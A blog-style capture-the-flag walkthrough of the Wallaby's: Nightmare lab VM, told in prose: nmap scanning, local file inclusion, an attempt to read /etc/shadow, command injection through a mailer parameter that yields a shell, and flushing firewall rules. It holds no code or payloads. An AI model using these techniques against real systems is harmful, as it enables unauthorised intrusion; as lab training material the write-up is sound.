Thursday, 12 January 2017

Wallaby's: Nightmare (1.0.2)


Today I want to present Wallaby's: Nightmare (1.0.2) walkthrough.

Scanning phase

Good, we know that our target has assigned IP 1921.68.56.100 or
Let's try investigate .101 deeper using nmap scanner with -p- -sV options.

Great, the result provided us to very juicy information such as open ports and version of services which are hosted on it.

Let's begin our penetration test for web application.

Interesting, isn't it? Let's try use test username.

Our username is used in the application, hmmm. Clicking on "Start the CTF!" we are redirected to certain page

Nothing interesting? Let's look at the URL, we can utilize page parameter to try LFI or RFI.

Bingo! This parameter is vulnerable to LFI! But unfortunately after this action I have got...

It's not issue with my network connection :-( I am confused, so let's try use nmap again.

Wow! port 80 is not open, but we can see that new port has been opened - 60080! Let's investigate this port!

Looking for some useful URL's I tried this URL address which I know

Bingo! There is also LFI vulnerability! Trying read /etc/shadow I haven;t got result.
I spent a lot of time on searching method or files which I will be able to display, I guessed mailer file.

Interesting, let's look at source code

Hmmm, in the source code, we can see that mailer file has mail parameter. Let's play with it.

Excellent! mail parameter can execute bash command!

Great! We have limited shell! Let's investigate what kind of privileges we have.

Good, we have full control on firewall, so le'ts flush rules.

OK, let's try connect to the IRC (port 6667) which was filtered before our action.
Now we are able to connect to the IRC.